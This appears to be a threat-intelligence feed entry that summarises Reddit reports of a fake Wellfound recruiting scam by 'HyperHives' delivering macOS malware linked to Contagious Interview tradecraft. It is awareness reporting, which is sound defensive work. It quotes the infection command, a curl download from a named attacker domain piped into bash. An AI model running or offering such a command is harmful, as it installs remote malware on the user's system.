Malware And CampaignsCampaign

Wellfound fake job interview malware, HyperHives Contagious Interview style

April 7, 2026r/hacking, r/malware

In r/hacking and r/malware, a fake recruiting flow on Wellfound delivers a macOS shell-piped installer, and the victim reverse-engineers it to extract config and infrastructure, tying it to the Contagious Interview tradecraft.

Open in PulseSee the full authority discussion →

QUOTES

Got a Wellfound job offer from “Felix” at “HyperHives.” Looked legit.

Then they asked me to “review the product” before the call. Visiting their site triggered:

curl -s https://macos.hyperhives.net/install | nohup bash &

571 encrypted config values decrypted, C2 and Sentry DSN exposed, DPRK/Contagious Interview attribution.

VOICES

r/hacking

r/malware

RELATED TERMS

social engineeringreverse engineeringmacOSreverse engineeringsocial engineering

OTHER FINDINGS IN MALWARE AND CAMPAIGNS

Axios npm package compromise, WAVESHAPER.V2 cross platform RAT Handala Hack Telegram threat claiming imminent Lockheed Martin data leak Telnyx PyPI compromise (TeamPCP) shipping malware in telnyx 4.87.1/4.87.2

AMYGDALA PULSE

See what authorities are saying right now

This finding is one of many signals tracked across Cyber Security. The live feed updates every few hours with new authority voices, debates, and emerging ideas.

Open Cyber Security Pulse Browse all topics

← Back to Cyber Security